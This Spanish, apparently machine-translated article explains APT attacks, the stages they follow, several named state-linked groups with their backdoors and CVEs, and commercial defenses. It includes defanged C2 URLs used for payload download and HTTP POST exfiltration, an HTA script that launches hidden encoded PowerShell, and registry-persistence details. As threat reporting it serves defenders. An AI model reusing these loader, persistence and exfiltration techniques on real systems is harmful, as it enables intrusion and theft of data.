¿Qué es un ataque APT y cómo defenderse de él?
Debe haber leído sobre ataques a la red a gran escala que afectaron a bancos, grandes corporaciones, agencias gubernamentales e incluso instalaciones militares. ¿Quién los sostiene? ¿Por qué son tan destructivos? ¿Puedes protegerte de ellos? Intentaremos responder a todas estas preguntas en el artículo de hoy.
Contenido
- 1 La aparición y evolución de los ataques APT
- 2 signos de un ataque APT
- 3 etapas de ataque APT
- 4 ataques APT modernos
- 5 grupos aptos
- 6 Protección contra ataques APT
La aparición y evolución de los ataques APT
Desde aproximadamente 2004, el equipo de respuesta a incidentes informáticos Lockheed Martin (LM-CIRT) comenzó a utilizar el término APT (Amenaza persistente avanzada) en su investigación . Entonces comenzó a llamar ataques complejos, llevados a cabo principalmente en la infraestructura de TI de las instalaciones militares y estatales. Como norma, se sospechaba que las agencias de inteligencia de otros países y destacamentos de «piratas informáticos del gobierno» los llevaban a cabo.
Luego, con las manos fáciles de los periodistas, el concepto de APT se expandió a ataques de varios niveles, cuyo propósito podría ser una red de cualquier organización o un grupo de dispositivos con características comunes. Incluso ahora, el término APT sigue siendo ambiguo. Se traduce como «amenaza persistente desarrollada» o «amenaza persistente compleja», lo que implica un escenario de ataque en varias etapas, las herramientas utilizadas en él o incluso grupos de hackers poderosos.
Sophos también señala que todavía no hay criterios unificados que permitan atribuir un ataque particular a APT. Los ataques dirigidos exitosos a menudo se llevan a cabo utilizando kits de exploits antiguos, por lo que las vulnerabilidades de 0 días no son un atributo obligatorio de APT.
Otro criterio APT a menudo destacado es el envío de correos electrónicos de phishing para comprometer la cuenta de un empleado común. Luego se utiliza como un punto de entrada a la red local y una base para pasar al siguiente nivel: a las computadoras de los administradores y servidores de la empresa. Sin embargo, los métodos de ingeniería social ya son superpopulares, por lo que sería extraño señalarlos como un marcador de una «amenaza constante compleja». ¿En qué vale la pena enfocarse?
Señales de un ataque APT
Analizando los informes de varios expertos en seguridad, formulé los siguientes criterios APT para mí (me alegraré si los aclara y complementa en los comentarios):
- Este siempre es un ataque dirigido. El objetivo generalmente no es una persona u organización específica, sino un segmento más general (por ejemplo, instituciones financieras) o un grupo homogéneo de personas (huéspedes del hotel, fanáticos en el estadio, pasajeros en un crucero).
- Este es un ataque a largo plazo. Puede durar más de un mes y continuar hasta el final victorioso o la pérdida de conveniencia.
- Este es un ataque bien financiado. Incluso el DDoS común es un procedimiento costoso si lleva mucho tiempo.
- Este es un ataque de varias etapas. APT utiliza constantemente varios vectores y diferentes técnicas. Por sí mismos, pueden ser primitivos, su combinación es interesante. Por ejemplo, una secretaria envía correos electrónicos de phishing para comprometer su cuenta corporativa y enviar un documento infectado a la computadora portátil de su jefe a través de ella (como de una persona autorizada).
- APT no detiene las herramientas de seguridad individuales (antivirus, firewall, filtros de spam, sistemas SIEM simples), y puede pasar desapercibido durante mucho tiempo o filtrarse bajo la apariencia de incidentes típicos individuales. Más importante aún, el comportamiento anormal de la red o los dispositivos individuales persiste, aunque no se encuentra nada sospechoso durante las comprobaciones de rutina.
- APT a menudo (pero no necesariamente) utiliza técnicas avanzadas que enmascaran eficazmente sus componentes de los sistemas de seguridad típicos. Por ejemplo, revierta el shell para omitir la ITU.
Según Sophos , APT utiliza las siguientes técnicas (enumeradas en orden decreciente de frecuencia): phishing e ingeniería social , DDoS y botnets, vulnerabilidades de día cero y malware avanzado que las utiliza, malware tradicional, dispositivos comprometidos, ataques internos y ataques a nivel de aplicación.
Etapas de ataque APT
En cualquier ataque de nivel APT, se pueden distinguir siete etapas clave (a veces reducidas a cinco, combinando pasos):
- Recolección pasiva de información (identificación y selección de objetivos de fuentes abiertas).
- Infección primaria (atraer a sitios de phishing, enviar documentos infectados).
- Entrega de carga de combate (drive-by-downloads, explotación de vulnerabilidades en el navegador y sus complementos).
- Fase activa (escalada de privilegios y omisión de sistemas de protección para obtener datos adicionales sobre el sistema y consolidar los principales componentes maliciosos en él).
- Obtención de control remoto (implementación de puertas traseras, keyloggers e instalación de shells inversas ).
- Comunicación con los servidores de administración en previsión de nuevos comandos (omitiendo los firewalls, utilizando varios mensajeros, clientes de redes sociales y API de red populares para transmitir comandos).
- Alcanzar el objetivo final (robo de datos, transacciones financieras ilegales, la formación de una botnet, tomar el control de un sistema de control industrial, etc.).
Villano zerodey
La efectividad de los ataques APT aumenta significativamente al explotar vulnerabilidades para las que aún no hay parche. Por ejemplo, según los expertos de 360 Core Security, en un ataque reciente, el grupo APT-C-06 utilizó el exploit 0day CVE-2018-8174 para el motor VBScript. Afecta a Internet Explorer en Windows 7–10 y plataformas de servidor de cualquier capacidad, comenzando con Windows Server 2012 R2.
Cuando abren un enlace de phishing o un documento de MS Office con un control ActiveX malicioso, VBScript se bloquea, como resultado de lo cual se cambia el tipo de objetos en la memoria y los derechos de acceso a ellos. Por lo tanto, el atacante tiene la oportunidad de ejecutar remotamente código arbitrario sin pasar por los sistemas de seguridad existentes. Además, APT-C-06 utilizó una de las técnicas populares de derivación UAC. Para un análisis detallado de CVE-2018-8174, lea aquí .
Otro grupo, APT37 (Reaper), utilizó un exploit para la vulnerabilidad de día cero en Adobe Flash Player CVE-2018-4878 en sus ataques a principios de 2018 . Afecta a las versiones anteriores a 28.0.0.161 y está asociado con un procesamiento de puntero incorrecto en el Primetime SDK. Un ataque exitoso conduce a la ejecución de código arbitrario a través de la sustitución de objetos en la memoria del proceso de flash player.
Ataques APT modernos
El equipo global de investigación y análisis de Kaspersky Lab (GReAT) ha preparado el último Informe de Tendencias APT Q2 2018 . Formularía las principales conclusiones de la siguiente manera:
- Los grupos APT ahora están aumentando su actividad, y los ataques asiáticos dominan en la cantidad de ataques;
- El ataque más poderoso registrado recientemente es VPNFilter. Probablemente detrás de él está el grupo APT28 (también conocido como Sofacy, Black Energy y otros más de 9000 títulos);
- los grupos APT descubiertos anteriormente no han desaparecido en ninguna parte, y el período de inactividad no significa el cese de su actividad. Pueden realizar pequeñas operaciones que son invisibles a escala global, o simplemente cambian el formato y seleccionan herramientas para nuevos ataques. Por ejemplo, la banda APT27 (también conocida como Emissary Panda y LuckyMouse) se despertó nuevamente;
- Los componentes comunes utilizados en los ataques de red de diferentes grupos APT hacen posible afirmar relaciones cercanas entre ellos. Por ejemplo, Scarcruft y Darkhotel usaron el mismo sitio en sus ataques para difundir exploits, uno de los cuales fue 0day;
- Existe una conexión clara entre los eventos mundiales (los Juegos Olímpicos de Invierno, las negociaciones sobre Corea del Norte y la cumbre de Singapur) y los vectores de nuevos ataques.
A fines de 2017, IDC Connect y Malwarebytes realizaron una encuesta entre los líderes (CIO, CTO y CSO) de más de 200 grandes (25% de ellos tenían más de 5,000 empleados) de organizaciones estadounidenses. Pertenecían a diferentes industrias (desarrollo de software, construcción, salud, servicios financieros). De los encuestados, el 80% afirmó que sus empresas sufrieron APT una o más veces durante el año pasado.
Sin embargo, si encuentra signos de una amenaza constante y compleja en su red, esto no significa que ese era el objetivo. Con el phishing de lanza, las lanzas (especialmente las asiáticas) a menudo no son lo suficientemente afiladas. Apuntando a alguien, pero te enganchó.
Grupos aptos
La compañía FireEye, con sede en California, conocida como una de las pioneras en la protección contra vulnerabilidades de 0 días, ha estado monitoreando las actividades de los grupos de hackers que llevan a cabo ataques dirigidos de gran alcance durante muchos años. Una escritura similar y herramientas comunes permitieron a FireEye resaltar los siguientes grupos clave.
Apt37
Presumiblemente un equipo de hackers gubernamentales de Corea del Norte. Otros nombres posibles: Group123, ScarCruft, RedEyes. Ha estado operando desde al menos 2012 y en 2017–2018 se volvió especialmente activo. La membresía en Corea del Norte se otorga mediante direcciones IP, marcas de tiempo (UTC +8: 30) y la elección de objetivos extranjeros, lo que refleja claramente los cambios en la política exterior de la RPDC.
Objetivos principales: instituciones estatales y militares de Corea del Sur, Japón, China y Vietnam. Menos comúnmente atacan a la India. Kuwait, Rusia y otros países probablemente se engancharon un par de veces, pero esto parece un accidente.
Los piratas informáticos APT37 a menudo atacan los sistemas SCADA en las instalaciones de producción química, rompen en redes de empresas de la industria aeroespacial y recopilan datos personales de bases de datos de instituciones médicas. Están tratando de robar documentación sobre los desarrollos actuales de alta tecnología de una red de empresas especializadas y universidades relacionadas.
Los ataques APT37 se han vuelto más sofisticados en los últimos años. Anteriormente, utilizaban principalmente métodos de ingeniería social, pero ahora el software especializado (en su mayoría puertas traseras) y conjuntos de nuevas hazañas, incluido 0day, han aparecido en su arsenal.
Herramientas utilizadas:
- RICECURRY JS profiler , que determina la versión del navegador, sus complementos y configuraciones para elegir el método de entrega de la carga útil;
- Utilidad CORALDECK para la entrega oculta de carga de combate en forma de archivos e imágenes encriptados;
- puerta trasera DOGCALL . Puede interceptar las pulsaciones del teclado, grabar capturas de pantalla y usar la API de almacenamiento en la nube para conectarse a sus servidores de administración (C&C);
- puerta trasera KARAE . Actúa en la primera etapa del ataque. Recopila información del sistema, después de lo cual puede enviar y descargar archivos. También utiliza la API de servicios en la nube para comunicarse con C&C. Distribuido a través de redes de intercambio de archivos bajo la apariencia de una aplicación para descargar videos de YouTube;
- La puerta trasera SLOWDRIFT también usa la API en la nube para recibir comandos de su servidor de administración. Ingresó a las computadoras de las víctimas a través de correos electrónicos de phishing y usó un exploit para el procesador de textos Hangul, un procesador de textos popular en los círculos académicos en Corea del Sur. Este es otro marcador de ataque dirigido, ya que en otros países el formato de documento HWPX es, por decirlo suavemente, impopular;
- puerta trasera POORAIM . El canal de distribución principal está dirigido a sitios pirateados: abrevaderos . Utiliza un mensajero AOL para comunicarse con C&C, que lo distingue de otro malware;
- la puerta trasera WINERACK recopila información sobre el sistema operativo, el software y el usuario, y luego lanza un shell inverso (Wine cmd.exe) en el host atacado para evitar NAT y el firewall;
- relativamente nueva puerta trasera velocidad de obturación , que utiliza zirodey de Office en el Microsoft CVE-2017-0199 . Recopila datos sobre el sistema, toma capturas de pantalla, carga comandos y lanza otro malware para su ejecución;
- HAPPYWORK Trojan Downloader . Utilizado en 2016 para atacar a las instituciones financieras. En el comando carga la carga de combate, y antes de eso recopila información del sistema y datos del usuario. También supervisa el estado de la función IsDebuggerPresent , que le permite asignar una llamada de programa arbitraria a Windows en lugar de la predeterminada (incluidos los componentes del sistema, como Explorer y el administrador de procesos);
- utilidades auxiliares: SOUNDWAVE para grabación oculta de un micrófono, RUHAPPY para cubrir pistas.
Principales técnicas APT37:
- Spear Phishing, o phishing dirigido. Se diferencia de las cartas fraudulentas calumniadas apresuradamente para el envío masivo con texto personalizado convincente, que es muy probable que sea picoteado por una determinada categoría de usuarios. Por ejemplo, se enviaron cartas a los decanos de las universidades de Corea del Sur sobre las subvenciones actuales y publicaciones científicas pidiendo una acción inmediata (para confirmar rápidamente la participación, enviar una solicitud, especificar detalles y similares) para que puedan comenzar el archivo adjunto;
- drive-by-boot. Un enlace de un documento en un archivo adjunto o de un sitio infectado redirige a una página web con un script que utiliza un exploit para descargas ocultas de malware;
- iniciar una carga de combate descargada mediante la sustitución de asociaciones de extensión de archivo o mediante vulnerabilidades en el mecanismo de Microsoft Dynamic Data Exchange;
- utilizando AOL IM o Dropbox y las API de pCloud para comunicarse con los servidores de administración de botnet;
- descargando la carga de combate al comando del servidor de administración y su lanzamiento a través de una vulnerabilidad en DDE o asociaciones de archivos de suplantación de identidad;
- explotación de vulnerabilidades en productos específicos (por ejemplo, en Hangul, un equivalente surcoreano de MS Word);
- explotación de vulnerabilidades de día cero en productos masivos (complemento de navegador Adobe Flash).
Apt34
Presumiblemente el grupo iraní, desde 2014 atacando una amplia gama de objetivos en el Medio Oriente. Principalmente involucrado en el robo de fondos de cuentas de bancos extranjeros y espionaje industrial en las industrias química y energética.
FireEye registró el ataque más grande con APT34 en mayo de 2016. Todo comenzó con una ola de correos electrónicos de phishing que contenían aplicaciones maliciosas que se enviaron a varios bancos a la vez. Estos fueron documentos de MS Excel con macros, pero todavía se abrieron debido al probable texto que lo acompaña. Los correos electrónicos contenían temas de mensajes relacionados con la infraestructura de TI (por ejemplo, un registro de informe de estado del servidor o una lista de componentes del dispositivo Cisco Iron Port). En un caso, la carta incluso continuó una conversación real por correo electrónico entre varios empleados y contenía su información de contacto válida.
La macro llamada función Init (), que extrajo contenido codificado en Base64 de las celdas de la hoja con el encabezado Incompatible (imitando una versión incompatible del documento). Luego buscó un script en% PUBLIC% \ Libraries \ update.vbs. Si no había script, entonces comenzó a crearlo a través de PowerShell, formando el cmdlet% PUBLIC% \ Libraries \ dns.ps1. La macro luego creó una tarea programada llamada GoogleUpdateTaskMachineUI con una llamada cada tres minutos. Debido a la variable codificada% PUBLIC%, la macro se ejecutó con éxito solo en Windows Vista y versiones anteriores, pero fueron las que a menudo se instalaron en las computadoras de destino. Además, después de un lanzamiento exitoso, la macro muestra el contenido de las celdas previamente ocultas en el documento enviado (a través de la función ShowHideSheets ()), solo para tranquilizar al usuario y calmar su vigilancia.
En el siguiente paso, el script update.vbs usó PowerShell para cargar la carga útil. Descargó el enlace hxxp: // go0gIe [.] Com / sysupdate.aspx? Req = xxx \ dwn & m = d del enlace ofuscado y almacenó componentes maliciosos en el directorio% PUBLIC% \ Libraries \ dn, el principal de los cuales era una utilidad Mimikatz modificada para extraer de Contraseñas de memoria RAM de usuarios registrados.
Luego descargó el enlace hxxp: // go0gIe [.] Com / sysupdate.aspx? Req = xxx \ bat & m = d otro archivo por lotes (.bat), lo ejecutó y guardó los resultados en el directorio vecino% PUBLIC% \ Libraries \ up . El archivo por lotes era el script más simple para recopilar información sobre el usuario y el sistema. Era un conjunto de comandos estándar como whoami, hostname, ipconfig / all, net user.
En la etapa final, se creó el cmdlet dns.ps1, que se utilizó para el envío oculto de archivos, y todos los datos recopilados se enviaron al servidor hxxp: // go0gIe [.] Com / sysupdate.aspx? Req = xxx \ upl & m = u utilizando el método HTTP POST.
En este ataque, el método de comunicación encubierta con el servidor de administración a través de consultas DNS es interesante. Es poco probable que el cortafuegos bloquee el protocolo DNS y, por lo general, su uso no activa los analizadores de comportamiento. Al comienzo del trabajo, el cmdlet dns.ps1 solicita a través del protocolo DNS un identificador del servidor go0gIe [.] Com. Este identificador se almacena en PowerShell y la siguiente solicitud se envía al servidor de comandos para obtener instrucciones adicionales. Si no se requiere ninguna otra acción, el cmdlet se completa y se activará nuevamente mediante el script update.vbs después de tres minutos. Si una serie de comandos provienen del servidor C&C, el cmdlet comienza a crear un archivo por lotes en% PUBLIC% \ Libraries \ tp \ chr (xx) chr (aa) .bat. Los valores específicos de las variables, el contenido del archivo BAT y los comandos de control están codificados como octetos de direcciones IP. Por ejemplo
Tales enfoques no triviales siempre despiertan el interés de los especialistas en seguridad, y el grupo APT34 ha ganado fama adicional debido a la implementación del ataque «sin archivos». Recientemente, usó la vulnerabilidad CVE-2017-11882 en Microsoft Office (2007 SP3 – 2016), que le permitió evitar los antivirus y otros analizadores de archivos. Usando el exploit, el código se inyectó en el proceso del Editor de ecuaciones de Microsoft Word. Por lo tanto, se implementó de forma encubierta una carga útil de hasta 17 Kbytes de tamaño, sin dejar rastros notables en el sistema de archivos.
Apt33
Presumiblemente, otro grupo iraní creado sobre la base del Instituto Nasr y que opera desde 2013. En sus ataques, APT33 utiliza herramientas de hackers disponibles públicamente, mostrando un interés particular en las compañías de aviación y energía. El último gran ataque realizado por APT33 desde mayo de 2017. Se dirige principalmente a instalaciones de aviación militar en Arabia Saudita y compañías petroquímicas de Corea del Sur.
El comienzo del ataque fue bastante clásico: envío de correos electrónicos de phishing con temas cuidadosamente seleccionados y un diseño atento. Para componerlos, utilizamos la herramienta ALFA TEaM Shell, que le permite enviar cientos de cartas específicas basadas en plantillas semiautomáticas. Ya hemos escrito sobre una de estas herramientas . El uso de ALFA TEaM Shell se hizo evidente al analizar la primera ola de correo no deseado: algunos campos contenían valores predeterminados, incluidos solevisible@gmail.com.Sin embargo, el error se corrigió rápidamente y el siguiente boletín se veía ordenado. El texto se refería a vacantes reales y salarios altos, e incluso incluía una solicitud de empleo en nombre de la empresa ficticia Equal Opportunity. Para hacerlo más convincente, APT33 ha registrado varios dominios que parecen pertenecer a Boeing, Northrop Grumman, Saudia Aerospace Engineering y otras compañías conocidas.
APT33 envió a los empleados infectados con una oferta de trabajo y enlaces a una aplicación HTML maliciosa (.hta) a empleados de varias compañías. Los archivos .HTA a menudo se usan en sitios de servicios de empleo para procesar solicitudes de vacantes disponibles. La sorpresa estaba en el script incorporado (ver fragmento a continuación).
1
2
3
4
|
<script>
a=new ActiveXObject(«WScript.Shell»);
a.run(‘%windir%\\System32\\cmd.exe /c powershell -window hidden -enc <redoctedencoded command>’, 0);
</script>
|
El script descargó la puerta trasera TURNEDUP, creada para el envío oculto de capturas de pantalla y recopiló información sobre la computadora infectada, así como para descargar herramientas adicionales al comando del servidor de administración. Para evitar los antivirus, la puerta trasera no se cargó directamente, sino a través del gotero troyano DROPSHOT. Se utilizaron métodos avanzados de protección contra el análisis heurístico. Parte del código fue llevado a secuencias de comandos externas, y su instalación y trabajo posterior fue protegida por sus propios controladores. Presumiblemente, esta es una modificación del cuentagotas desarrollado por otro grupo iraní APT (SHAMOON, también conocido como Disttrack). Anteriormente utilizaron una opción similar para entregar la puerta trasera SHAPESHIFT y la víbora StoneDrill . Este último simplemente borró todos los datos de la computadora infectada, es decir, ya no era espionaje, sino sabotaje.
Entre otras herramientas APT33, se notaron dos desarrollos de terceros más: el programa de acceso remoto (RAT) de NANOCORE vendido en la darknet con soporte de complemento y la puerta trasera NETWIRE enfocada en el robo de datos.
APT32 (OceanLotus)
Un grupo de hackers que ataca principalmente a compañías extranjeras que invierten en el desarrollo de la producción en Vietnam. Las principales industrias son el comercio minorista, la consultoría y el sector hotelero. Esta elección de objetivos no está clara, al igual que los motivos. Según los expertos de FireEye, APT32 actúa en interés del gobierno vietnamita. Los ataques podrían llevarse a cabo para recopilar información por parte de las agencias policiales. También podría ser el robo habitual de propiedad intelectual o incluso medidas peculiares para combatir la corrupción y el negocio en la sombra. De una forma u otra, las actividades de APT32 finalmente socavaron la ventaja competitiva de sus organizaciones elegidas.
Los ataques en sí mismos no difieren en complejidad técnica. Este es el mismo intento de obligar al usuario a ejecutar una macro maliciosa utilizando métodos de ingeniería social. Uno muestra un mensaje sobre la necesidad imaginaria de permitir que las macros muestren la fuente que falta, y el otro muestra códigos de error arbitrarios en formato hexadecimal y un montón de alertas «¡Activa las macros!». Por extraño que parezca, un método tan tosco resultó ser bastante efectivo.
Dependiendo del escenario de ataque, la macro inicia uno o más programas maliciosos:
- BEACON – inyecta código arbitrario en procesos en ejecución. Recopila información de credenciales de usuario. Importa credenciales de sesión Kerberos. Puede usar el marco Metasploit;
- KOMPROGO es una puerta trasera con todas las funciones que realiza acciones en secreto con el registro y el sistema de archivos. Puede desencadenar un caparazón inverso. También recopila y envía información sobre el sistema infectado;
- PHOREAL: una puerta trasera que crea un shell inverso y admite la comunicación con el servidor de comandos a través de ICMP;
- SOUNDBITE es una puerta trasera que establece comunicación con el servidor de administración mediante consultas DNS codificadas. Capaz de recopilar datos sobre el sistema y los usuarios, crear y enviar archivos, así como realizar cambios en el registro;
- WINDSHIELD es una puerta trasera que utiliza técnicas anti-depuración. Establece una conexión con C&C a través de sockets TCP sin procesar. Selecciona aleatoriamente uno de los cuatro servidores de control y seis puertos. Recopila la información más detallada sobre el sistema y registra cualquier cambio en el registro o el sistema de archivos. Puede descargar otros procesos de la memoria, incluidos algunos antivirus.
Además, en los ataques APT32, se utilizó la vulnerabilidad de la organización de lanzar los controladores de modo kernel CVE-2016-7255 . Es relevante para la mayoría de las versiones de Windows (desde Vista SP2 hasta 10.1607) y le permite ejecutar código malicioso con privilegios elevados.
APT19 (equipo C0d0so0)
Presumiblemente un grupo de piratas informáticos chinos que consiste en trabajadores independientes que actúan en interés del gobierno de la RPC. En 2010, pirateó el sitio web del Comité del Premio Nobel de la Paz en Noruega para distribuir puertas traseras a través del método del abrevadero, y en 2014 repitió la misma técnica con Forbes.com. Al visitar sitios comprometidos, el navegador cargó un script malicioso de otro y el malware realizó una operación de carga.
En 2017, APT19 atacó a firmas de abogados australianas para obtener información comercial sobre sus clientes internacionales, dando a las compañías chinas una ventaja competitiva. Luego usó tres cebos diferentes de phishing. A principios de mayo, los documentos de phishing eran documentos en formato RTF que cargaban cargas útiles a través de la vulnerabilidad de día cero en Microsoft Office ( CVE 2017-0199) . A fines de mayo, APT19 cambió a usar hojas de cálculo Excel (XLSM) con soporte para macros. APT19 luego agregó una invocación indirecta de documentos XLSM infectados, y al menos uno de los nuevos señuelos entregó una modificación a la puerta trasera de BEACON llamada Cobalt Strike.
Paralelamente, las puertas traseras de la familia Derusbi se entregaron al sistema bajo la apariencia de keygen para la versión paga del antivirus AVG. Al inicio, crearon dos archivos:% LOCALAPPDATA% \ dbgeng.dll (componente troyano) y% LOCALAPPDATA% \ fakerx86.exe (depurador simbólico de Windows). Luego comprueba que no se está ejecutando en el contexto de rundll32.exe (es decir, no en el entorno limitado ni en el depurador). Si la comprobación se realiza correctamente, se crea la clave de registro HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Windows Debug Tools -% LOCALAPPDATA% \ fakerx86.exe y se establece la comunicación con el servidor de comandos.
Se envía una codificación base64 a los C&C utilizando el método HTTP POST con información del sistema (direcciones IP y MAC, nombre de usuario y nombre de la computadora, información de hardware). En respuesta, el servidor envía más comandos codificados en el parámetro de color de fondo de la página web falsa. Para su implementación, también puede transferir componentes adicionales.
Protección contra ataques APT
Durante muchos años, las compañías de antivirus han competido entre sí para ofrecer su protección contra APT. Para la mayoría, no es muy diferente de un conjunto de herramientas tradicionales para analizar el tráfico, el sistema de archivos y los procesos en ejecución. Con el pretexto de Anti-APT, se han vuelto más fáciles de vender.
Hasta donde yo sé, todavía no existen métodos efectivos para contrarrestar APT. Una precaución razonable (ver capacitación en seguridad) y las siguientes soluciones técnicas de grandes proveedores ayudarán a reducir los daños causados por ellos.
Kaspersky Threat Management and Defense
Incluye un sistema de protección contra ataques dirigidos, Kaspersky Anti Targeted Attack (detecta anomalías en el tráfico de red, aísla procesos sospechosos y rastrea la relación entre eventos) y Kaspersky Endpoint Detection and Response (es responsable de recopilar y visualizar los datos recopilados).
Symantec Advanced Threat Protection
Utiliza el concepto de puntos de control, rastreando cambios a lo largo de los principales vectores de ataques APT. Busca anomalías en el tráfico de correo y la actividad de red de las aplicaciones. Utiliza ampliamente sandboxes para aislar procesos y verificar archivos descargados a través de la red. Aplica análisis de reputación y tecnologías de verificación en la nube. Se puede integrar con sistemas SIEM de terceros.
Plataforma de inteligencia de seguridad IBM QRadar
Un sistema SIEM avanzado que utiliza IBM Watson AI para detectar ataques APT temprano y determinar su origen.
RSA NetWitness
Otro SIEM avanzado con tecnologías de aprendizaje automático. Una solución integrada para analizar el tráfico de red, el análisis de comportamiento, monitorear el comportamiento de los puntos finales y encontrar la relación entre las desviaciones identificadas.
Suscripciones de FireEye iSIGHT Intelligence
Suscripción a informes analíticos sobre ataques actuales con su descripción detallada y recomendaciones para contrarrestar el APT identificado. Más de 150 especialistas participan en su gestión, y la visualización de datos se lleva a cabo a través de una interfaz web y las API de FireEye.